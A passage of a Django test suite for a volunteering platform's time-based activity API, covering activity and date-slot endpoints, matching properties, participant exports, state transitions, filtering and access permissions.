'initiative': {
'data': {
'type': 'initiatives', 'id': self.activity.initiative.id
},
},
}
}
}
def test_get_owner(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['attributes']['title'], self.activity.title)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
True
)
self.assertTrue(
{'name': 'cancel', 'target': 'cancelled', 'available': True}
in data['meta']['transitions']
)
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_matching_theme(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.favourite_themes.add(self.activity.initiative.theme)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], True)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_mismatching_theme(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.favourite_themes.add(ThemeFactory.create())
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], False)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_matching_skill(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.skills.add(self.activity.expertise)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], True)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_mismatching_skill(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.skills.add(SkillFactory.create())
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], False)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_get_owner_export_disabled(self):
initiative_settings = InitiativePlatformSettings.load()
initiative_settings.enable_participant_exports = False
initiative_settings.save()
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']
self.assertIsNone(export_url)
def test_get_owner_export_enabled(self):
initiative_settings = InitiativePlatformSettings.load()
initiative_settings.enable_participant_exports = True
initiative_settings.save()
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']['url']
export_response = self.client.get(export_url)
sheet = load_workbook(filename=BytesIO(export_response.content)).get_active_sheet()
self.assertEqual(sheet['A1'].value, 'Email')
self.assertEqual(sheet['B1'].value, 'Name')
self.assertEqual(sheet['C1'].value, 'Motivation')
wrong_signature_response = self.client.get(export_url + '111')
self.assertEqual(
wrong_signature_response.status_code, 404
)
def test_export_with_segments(self):
initiative_settings = InitiativePlatformSettings.load()
initiative_settings.enable_participant_exports = True
initiative_settings.save()
department = SegmentTypeFactory.create(name='Department')
music = SegmentTypeFactory.create(name='Music')
workshop = SegmentFactory.create(
type=department,
name='Workshop'
)
metal = SegmentFactory.create(
type=music,
name='Metal'
)
classical = SegmentFactory.create(
type=music,
name='Classical'
)
user = BlueBottleUserFactory.create()
user.segments.add(workshop)
user.segments.add(metal)
user.segments.add(classical)
self.participant_factory.create(
activity=self.activity,
user=user,
status='accepted'
)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']['url']
export_response = self.client.get(export_url)
sheet = load_workbook(filename=BytesIO(export_response.content)).get_active_sheet()
self.assertEqual(sheet['A1'].value, 'Email')
self.assertEqual(sheet['B1'].value, 'Name')
self.assertEqual(sheet['C1'].value, 'Motivation')
self.assertEqual(sheet['F1'].value, 'Department')
self.assertEqual(sheet['G1'].value, 'Music')
self.assertEqual(sheet['F2'].value, 'Workshop')
self.assertEqual(sheet['G2'].value, 'Classical, Metal')
def test_get_other_user_export(self):
response = self.client.get(self.url, user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']
self.assertIsNone(export_url)
def test_get_open(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.data = response.json()['data']
self.assertTrue(
{'name': 'cancel', 'target': 'cancelled', 'available': True}
in self.data['meta']['transitions']
)
def test_get_contributors(self):
self.participant_factory.create_batch(4, activity=self.activity)
withdrawn = self.participant_factory.create(activity=self.activity)
withdrawn.states.withdraw(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
self.response_data['meta']['contributor-count'],
4
)
response = self.client.get(
self.response_data['relationships']['contributors']['links']['related'],
user=self.activity.owner
)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
len(self.response_data),
5
)
def test_get_contributors_anonymous(self):
self.participant_factory.create_batch(4, activity=self.activity)
withdrawn = self.participant_factory.create(activity=self.activity)
withdrawn.states.withdraw(save=True)
response = self.client.get(self.url)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
self.response_data['meta']['contributor-count'],
4
)
response = self.client.get(
self.response_data['relationships']['contributors']['links']['related'],
)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
len(self.response_data),
4
)
def test_get_contributors_participant(self):
self.participant_factory.create_batch(4, activity=self.activity)
withdrawn = self.participant_factory.create(activity=self.activity)
withdrawn.states.withdraw(save=True)
participant = self.participant_factory.create(activity=self.activity)
participant.states.withdraw(save=True)
response = self.client.get(self.url, user=participant.user)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
self.response_data['meta']['contributor-count'],
4
)
response = self.client.get(
self.response_data['relationships']['contributors']['links']['related'],
user=participant.user
)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
len(self.response_data),
5
)
def test_get_non_anonymous(self):
response = self.client.get(self.url)
data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(data['attributes']['title'], self.activity.title)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
False
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
False
)
def test_update_owner(self):
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json()['data']['attributes']['title'],
self.data['data']['attributes']['title']
)
def test_update_manager(self):
response = self.client.put(
self.url, json.dumps(self.data), user=self.activity.initiative.activity_managers.first()
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json()['data']['attributes']['title'],
self.data['data']['attributes']['title']
)
def test_update_initiative_owner(self):
response = self.client.put(
self.url, json.dumps(self.data), user=self.activity.initiative.owner
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json()['data']['attributes']['title'],
self.data['data']['attributes']['title']
)
def test_update_unauthenticated(self):
response = self.client.put(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_update_wrong_user(self):
response = self.client.put(
self.url, json.dumps(self.data), user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_owner(self):
response = self.client.delete(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_delete_unauthenticated(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_delete_wrong_user(self):
response = self.client.delete(
self.url, user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_submitted(self):
self.activity.initiative.states.submit(save=True)
response = self.client.delete(
self.url, user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_deleted(self):
self.activity.states.delete(save=True)
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_rejected(self):
self.activity.states.reject(save=True)
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class DateDetailAPIViewTestCase(TimeBasedDetailAPIViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
def setUp(self):
super().setUp()
self.data['data']['attributes'].update({
'start': str(now() + timedelta(days=21)),
'duration': '4:00',
})
self.slot = self.activity.slots.first()
self.slot_url = reverse('date-slot-detail', args=(self.slot.pk,))
def test_get_included_slot_location(self):
self.activity.save()
response = self.client.get(self.url)
included_resources = response.json()['included']
slots = [
resource for resource
in included_resources
if resource['type'] == 'activities/time-based/date-slots'
]
location_ids = [
resource['id'] for resource
in included_resources
if resource['type'] == 'geolocations'
]
for slot in slots:
self.assertTrue(slot['relationships']['location']['data']['id'] in location_ids)
def test_get_calendar_links(self):
response = self.client.get(self.url, user=self.activity.owner)
links = response.json()['data']['attributes']['links']
self.assertTrue(
links['ical'].startswith(
reverse('date-ical', args=(self.activity.pk, self.activity.owner.id))
)
)
def test_get_my_contributor(self):
participant = DateParticipantFactory.create(activity=self.activity)
response = self.client.get(self.url, user=participant.user)
included_participant = get_first_included_by_type(response, 'contributors/time-based/date-participants')
self.assertEqual(str(participant.pk), included_participant['id'])
def test_matching_all(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.skills.add(self.activity.expertise)
user.favourite_themes.add(self.activity.initiative.theme)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], True)
self.assertEqual(data['meta']['matching-properties']['theme'], True)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_all_cancelled(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.refresh_from_db()
self.activity.states.cancel(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create()
PlaceFactory.create(
content_object=user,
position=Point(x=4.9848386, y=52.3929661)
)
user.skills.add(self.activity.expertise)
user.favourite_themes.add(self.activity.initiative.theme)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], False)
self.assertEqual(data['meta']['matching-properties']['theme'], False)
self.assertEqual(data['meta']['matching-properties']['location'], False)
def test_matching_location_place(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_location(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_place_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(x=4.4207882, y=51.9280712)
slot.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
def test_matching_location_location_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(x=4.4207882, y=51.9280712)
slot.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
class PeriodDetailAPIViewTestCase(TimeBasedDetailAPIViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
def setUp(self):
super().setUp()
self.data['data']['attributes'].update({
'deadline': str(date.today() + timedelta(days=21)),
})
def test_get_open(self):
super().test_get_open()
self.assertFalse(
{'name': 'succeed_manually', 'target': 'succeeded', 'available': True}
in self.data['meta']['transitions']
)
def test_get_open_with_participant(self):
self.activity.duration_period = 'weeks'
self.activity.save()
PeriodParticipantFactory.create(activity=self.activity)
super().test_get_open()
self.assertTrue(
{'name': 'succeed_manually', 'target': 'succeeded', 'available': True}
in self.data['meta']['transitions']
)
def test_matching_location_place(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.8981734, y=52.3790565)
self.activity.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_location(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.8981734, y=52.3790565)
self.activity.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.8948386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_place_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.4207882, y=51.9280712, )
self.activity.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
def test_matching_location_location_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.4207882, y=51.9280712, )
self.activity.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
class TimeBasedTransitionAPIViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.url = reverse('{}-transition-list'.format(self.type))
self.data = {
'data': {
'type': 'activities/time-based/{}-transitions'.format(self.type),
'attributes': {},
'relationships': {
'resource': {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'id': self.activity.pk
}
}
}
}
}
def test_delete_by_owner(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'delete'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
self.assertEqual(
data['included'][0]['type'],
'activities/time-based/{}s'.format(self.type)
)
self.assertEqual(data['included'][0]['attributes']['status'], 'deleted')
def test_delete_by_other_user(self):
self.data['data']['attributes']['transition'] = 'delete'
response = self.client.post(
self.url,
json.dumps(self.data),
user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
data = json.loads(response.content)
self.assertEqual(data['errors'][0], "Transition is not available")
def test_reject(self):
self.data['data']['attributes']['transition'] = 'reject'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
data = json.loads(response.content)
self.assertEqual(data['errors'][0], "Transition is not available")
def test_approve(self):
self.data['data']['attributes']['transition'] = 'approve'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
data = json.loads(response.content)
self.assertEqual(data['errors'][0], "Transition is not available")
class DateTransitionAPIViewTestCase(TimeBasedTransitionAPIViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
class PeriodTransitionAPIViewTestCase(TimeBasedTransitionAPIViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
class DateActivitySlotListAPITestCase(BluebottleTestCase):
def setUp(self):
self.client = JSONAPITestClient()
self.url = reverse('date-slot-list')
self.activity = DateActivityFactory.create(slots=[], slot_selection='free')
self.data = {
'data': {
'type': 'activities/time-based/date-slots',
'attributes': {
'title': 'Kick-off',
'is-online': True,
'start': '2020-12-01T10:00:00+01:00',
'duration': '2:30:00',
'capacity': 10,
},
'relationships': {
'activity': {
'data': {
'type': 'activities/time-based/dates',
'id': str(self.activity.pk)
},
},
}
}
}
def test_get(self):
DateActivitySlotFactory.create_batch(3, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(self.url, {'activity': self.activity.id})
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_filtered_start(self):
DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
latest = DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'start': (now() + timedelta(days=5)).strftime('%Y-%m-%d')
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
self.assertEqual(response.json()['data'][0]['id'], str(latest.pk))
def test_get_invalid_start(self):
DateActivitySlotFactory.create_batch(3, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(
self.url, {'activity': self.activity.id, 'start': 'invalid'}
)
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_filtered_end(self):
first = DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'end': (now() + timedelta(days=3)).strftime('%Y-%m-%d')
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
self.assertEqual(response.json()['data'][0]['id'], str(first.pk))
def test_get_invalid_end(self):
DateActivitySlotFactory.create_batch(3, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(
self.url, {'activity': self.activity.id, 'end': 'invalid'}
)
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_filtered_both(self):
DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
middle = DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'start': (now() + timedelta(days=3)).strftime('%Y-%m-%d'),
'end': (now() + timedelta(days=5)).strftime('%Y-%m-%d')
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
self.assertEqual(response.json()['data'][0]['id'], str(middle.pk))
def test_get_filtered_contributor_id(self):
participant = DateParticipantFactory.create(activity=self.activity)
slot = DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
slot_participant = SlotParticipantFactory(slot=slot, participant=participant)
slot_participant.states.withdraw(save=True)
second = DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
slot_participant = SlotParticipantFactory(slot=second, participant=participant)
third = DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
other_participant = DateParticipantFactory.create(activity=self.activity)
slot_participant = SlotParticipantFactory(slot=third, participant=other_participant)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'contributor': participant.id
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], 1)
self.assertEqual(response.json()['data'][0]['id'], str(second.pk))
def test_get_many(self):
DateActivitySlotFactory.create_batch(12, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(self.url, {'activity': self.activity.id})
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(len(response.json()['data']), 8)
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
response = self.client.get(self.url, {'activity': self.activity.id, 'page[number]': 2})
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(len(response.json()['data']), 4)
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_no_activity_id(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_get_invalid_activity_id(self):
response = self.client.get(self.url, {'activity': 'some-thing-wrong'})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_get_incorrect_activity_id(self):
response = self.client.get(self.url, {'activity': 1034320})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['meta']['pagination']['count'], 0)
self.assertEqual(len(response.json()['data']), 0)
def test_get_closed_site(self):
MemberPlatformSettings.objects.update(closed=True)
group = Group.objects.get(name='Anonymous')
group.permissions.remove(Permission.objects.get(codename='api_read_dateactivity'))
group.permissions.remove(Permission.objects.get(codename='api_read_dateactivity'))
response = self.client.get(self.url, {'activity': self.activity.pk})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_owner(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = response.json()
included = [{'id': resource['id'], 'type': resource['type']} for resource in data['included']]
for attr in ['start', 'duration', 'capacity']:
self.assertTrue(attr in data['data']['attributes'])
self.assertEqual(data['data']['meta']['status'], 'open')
self.assertTrue(
{'id': str(self.activity.pk), 'type': 'activities/time-based/dates'} in included
)
def test_create_other(self):
response = self.client.post(
self.url, json.dumps(self.data), user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_anonymous(self):
response = self.client.post(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_open_activity(self):
DateActivitySlotFactory.create(activity=self.activity)
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.post(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class DateActivitySlotDetailAPITestCase(BluebottleTestCase):
def setUp(self):
self.client = JSONAPITestClient()
self.activity = DateActivityFactory.create()
self.slot = DateActivitySlotFactory.create(activity=self.activity)
self.url = reverse('date-slot-detail', args=(self.slot.pk,))
self.data = {
'data': {
'type': 'activities/time-based/date-slots',
'id': str(self.slot.pk),
'attributes': {
'title': 'New title',
},
}
}
def test_update_owner(self):
response = self.client.patch(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()
for attr in ['start', 'duration', 'capacity']:
self.assertTrue(attr in data['data']['attributes'])
self.assertEqual(data['data']['meta']['status'], 'open')
activity = get_first_included_by_type(response, 'activities/time-based/dates')
self.assertTrue('errors' in activity['meta'])
self.assertTrue('required' in activity['meta'])
def test_update_other(self):
response = self.client.patch(
self.url, json.dumps(self.data), user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_anonymous(self):
response = self.client.patch(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_update_open_activity(self):
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.patch(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_owner(self):
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()
included = [{'id': resource['id'], 'type': resource['type']} for resource in data['included']]
for attr in ['start', 'duration', 'capacity']:
self.assertTrue(attr in data['data']['attributes'])
self.assertEqual(data['data']['meta']['status'], 'open')
self.assertTrue(
{'id': str(self.activity.pk), 'type': 'activities/time-based/dates'} in included
)
def test_get_other(self):
response = self.client.get(
self.url, user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_calendar_links(self):
self.slot.is_online = True
self.slot.online_meeting_url = 'http://example.com'
self.slot.save()
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
links = response.json()['data']['attributes']['links']
self.assertTrue(
urllib.parse.quote_plus(self.slot.online_meeting_url) in links['google']
)
self.assertTrue(
'https://calendar.google.com/calendar/render?action=TEMPLATE' in links['google']
)
self.assertTrue(
links['ical'].startswith(
reverse('slot-ical', args=(self.slot.pk,))
)
)
def test_closed_site(self):
MemberPlatformSettings.objects.update(closed=True)
group = Group.objects.get(name='Anonymous')
group.permissions.remove(Permission.objects.get(codename='api_read_dateactivity'))
group.permissions.remove(Permission.objects.get(codename='api_read_dateactivity'))
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_get_anonymous(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_open_activity(self):
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_owner(self):
